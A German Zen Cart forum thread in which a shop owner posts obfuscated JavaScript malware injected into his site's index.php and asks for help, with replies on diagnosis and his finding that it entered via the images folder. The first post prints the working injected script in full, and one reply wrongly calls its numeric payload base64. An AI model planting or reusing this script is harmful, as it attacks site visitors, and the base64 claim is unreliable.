Ergebnis 1 bis 7 von 7

Thema: Schadcode eingespielt !!!

  1. #1
    Padawan Stufe I Avatar von colossos
    Registriert seit
    28.08.2010
    Ort
    Germany - Berlin
    Beiträge
    39
    Themen
    12
    DANKE
    2
    erhaltene Danke

    Ausrufezeichen Schadcode eingespielt !!!

    Hallo Gemeinde,

    leider hat es doch jemand geschafft auch auf meiner Internetpräsenz einen Schadcode einzuspielen.

    Gemerkt habe ich das durch das verschobene CSS-Design und das der Hinweis auf den Log der IP nicht mehr zu sehen ist. Leider habe ich keine Ahnung davon, was mir da eingespielt wurde. Ich habe den Code mal kopiert. Vielleicht kann mir jemand weiterhelfen, auf welchem Weg das Teil auf meinen Server gekommen ist und was es eigentlich macht?

    Code:
    echo "                                                                                                                                                                                                                                                                                                       <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                            try{window.document.body++}catch(gdsgsdg){dbshre=244;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,106,97,113,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,103,99,115,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,92,105,91,97,99,114,88,100,103,95,111,105,93,108,93,100,37,91,104,103,42,107,106,90,96,41,103,96,105,33,54,4,2,25,26,27,23,103,99,115,41,106,108,114,102,96,37,104,104,109,100,107,97,104,104,27,52,24,32,91,93,106,103,101,111,111,92,31,52,7,5,23,24,25,26,106,97,113,39,109,111,112,100,94,40,93,102,106,93,95,109,23,53,25,33,43,30,51,6,4,27,23,24,25,105,101,112,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,106,97,113,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,106,97,113,39,109,111,112,100,94,40,103,92,94,109,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,105,101,112,38,108,110,116,99,93,39,110,106,103,24,54,26,34,40,104,113,33,54,4,2,6,4,27,23,24,25,99,97,23,32,26,94,106,90,109,102,95,105,107,38,96,95,111,60,100,94,103,96,101,108,59,115,68,91,32,32,105,101,112,31,34,35,27,114,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,110,106,98,110,96,31,31,53,94,100,109,24,98,94,56,83,31,104,100,116,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,104,100,116,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,102,98,114,35,54,4,2,25,26,27,23,117,6,4,120,32,32,34,53);s=\"\";for(i=0;i-474!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";
    An dieser Stelle..

    MFG COLOSSOS
    Planung ist der Ersatz von Zufall durch Irrtum - Nicht verstanden ? Na gut, sagen wir doch einfach das Glück bevorzugt den der vorbereitet ist.

  2. #2
    Jedi-Ritter Avatar von webchills
    Registriert seit
    30.10.2004
    Ort
    Österreich
    Beiträge
    6.046
    Themen
    81
    DANKE
    3
    Erhaltene Danke: 949

    Standard

    Mit diesem Code fängt niemand was an und anhand dieses Codes kann niemand sagen, wie das gemacht wurde

    Wichtiger wäre:
    - In welcher Datei hast Du diesen Code gefunden?
    - Wurden auch andere Dateien verändert?
    - Bei welchem Provider bis Du?
    - Was sagt der Provider dazu?
    - Laufen auf dem Webspace noch andere Systeme?
    - Was sagen die Zugriffslogfiles vom Zeitpunkt der Veränderung? Darin ist ersichtlich, ob das per FTP gemacht wurde.
    !!! kostenloser Support ausschließlich im Forum - Nicht per Email, nicht per Telefon und nicht per PM !!!

  3. #3
    Padawan Stufe I Avatar von colossos
    Registriert seit
    28.08.2010
    Ort
    Germany - Berlin
    Beiträge
    39
    Themen
    12
    DANKE
    2
    erhaltene Danke
    Erstellt von

    Ausrufezeichen Schadcode

    Hallo Webchills,

    der Provider ist diesem Fall Alfahosting. Und ja es waren mehrere Webseiten betroffen.


    • Auch die gehosteten Server eines Bekannten waren betroffen.
    • Der Provider hüllt sich bisher in Schweigen und sagt es wäre nicht sein Fehler.
    • Die Admin Logins in Zen Cart lassen nicht auf einen unautorisierten Zugriff schließen.
    • Der Schadcode war direkt auf der index.php eingespielt. Ich kann nicht sagen, wie viele Dateien im admin oder der includes betroffen waren, aber es waren einige. Das Austauschen der index allein brachte keine Veränderung. Daher habe ich mich dazu entschieden das ganze System neu aufzuspielen.
    • FTP Logs werde ich noch checken und berichten.
    • Beim Durchsuchen habe ich keine schadhaften Skripte oder ähnliches entdeckt. (Jedenfalls nicht offensichtlich)


    Ich fragte ja nur, ob jemand sowas schon mal gesehen hat, weil ich aus der Anreihung der Zahlen mir kein Bild machen konnte.
    Nun ja wie das so immer ist: Was man nicht weiß, will man trotzdem verstehen.

    MFG COLOSSOS
    Planung ist der Ersatz von Zufall durch Irrtum - Nicht verstanden ? Na gut, sagen wir doch einfach das Glück bevorzugt den der vorbereitet ist.

  4. #4
    Jedi-Ritter Avatar von eentje
    Registriert seit
    17.09.2009
    Ort
    Bad Nieuweschans
    Beiträge
    1.385
    Themen
    6
    DANKE
    13
    Erhaltene Danke: 77

    Standard

    Den code ist adware, es sollte ein popup kommen mit etwas wie:

    Gratuliert Sie haben ein iPhone gewonnen...

    die ziffern sind base64 encoded html

    Den satz wirst du ungefähr in jeden index.php Datei bei dir finden. Vielleicht auch noch in de .js Dateien abhängig davon ob es die neuere Version ist oder die alte.

    Die Leute suchen eichtlich nach etwas ältere WordPress installs und/oder CMS MS, wenn du die da drauf hast dan bitte die auf ein andere Server stellen.
    Rechtschreibungsfehler bitte verzeihen wegen das ich a) blond bin und b) niederländer

    I came, I saw, I got Zenned...

  5. #5
    Padawan Stufe I Avatar von colossos
    Registriert seit
    28.08.2010
    Ort
    Germany - Berlin
    Beiträge
    39
    Themen
    12
    DANKE
    2
    erhaltene Danke
    Erstellt von

    Standard Schadcode

    @ entje

    hast du recht gehabt. Der Schadcode befand sich in etlichen Dateien. Aber ein Popup kam nicht. Lediglich war das CSS Design bei allen meinen Homepage Templates verschoben und hat dafür gesorgt das bei jedem Besuch der Webseiten Zone Alarm angesprungen ist.

    Verzeih mir meine Unwissenheit, aber was meinst du mit alten Word press und cms ms ???? Wo soll ich da suchen, bzw. was sind die Schritte??

    MFG COLOSSOS
    Planung ist der Ersatz von Zufall durch Irrtum - Nicht verstanden ? Na gut, sagen wir doch einfach das Glück bevorzugt den der vorbereitet ist.

  6. #6
    Jedi-Ritter Avatar von eentje
    Registriert seit
    17.09.2009
    Ort
    Bad Nieuweschans
    Beiträge
    1.385
    Themen
    6
    DANKE
    13
    Erhaltene Danke: 77

    Standard

    Stimmt, den pop-up kommt nicht bei Zen Cart.

    Die ältere WordPress oder CMS MS brauchen nicht auf dein Teil vom Server zu stehen wenn du auf shared hosting bist, kann auch von ein deiner hunderte Nachbarn sein.
    Rechtschreibungsfehler bitte verzeihen wegen das ich a) blond bin und b) niederländer

    I came, I saw, I got Zenned...

  7. #7
    Padawan Stufe I Avatar von colossos
    Registriert seit
    28.08.2010
    Ort
    Germany - Berlin
    Beiträge
    39
    Themen
    12
    DANKE
    2
    erhaltene Danke
    Erstellt von

    Standard SO - Nachträgliche Info ...

    Ich habe mir noch mal die Arbeit gemacht und die Verseuchten Dateien durchgeforstet. Der Schadcode wurde definitiv über den /images Ordner in das system gebracht. (Die dort angelegte HTML würde verändert)

    Entweder ist mir da selbst ein Fehler unterlaufen (Ordnerrechte falsch gesetzt) oder es gibt da noch ein Schlupfloch..

    MFG COLOSSOS
    Planung ist der Ersatz von Zufall durch Irrtum - Nicht verstanden ? Na gut, sagen wir doch einfach das Glück bevorzugt den der vorbereitet ist.

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
zen-cart-pro.at
Zen Cart ist eine kostenlose unter der GPL-Lizenz veröffentlichte Open-Source Shopsoftware. Das System wird in den USA entwickelt, die amerikanische Website dazu ist www.zen-cart.com

Die deutsche Zen-Cart Version, um die es hier auf zen-cart-pro.at geht, ist eine Anpassung der amerikanischen Version an die Bedürfnisse von Onlineshopbetreibern im deutschsprachigen Raum.

Die deutsche Zen Cart Version wird von einem Team von Entwicklern in Österreich und Deutschland betreut, weiterentwickelt und supportet und steht kostenlos in unserem Downloadbereich zur Verfügung.

[mehr]
Follow Us
  • zen-cart-pro-at auf Twitter
  • zen-cart-pro-at auf Github
  • zen-cart-pro-at auf SourceForge
Aktuelle Version
Zen Cart 1.5.5 deutsch
Revision 1184 vom 01.09.2016
[Download]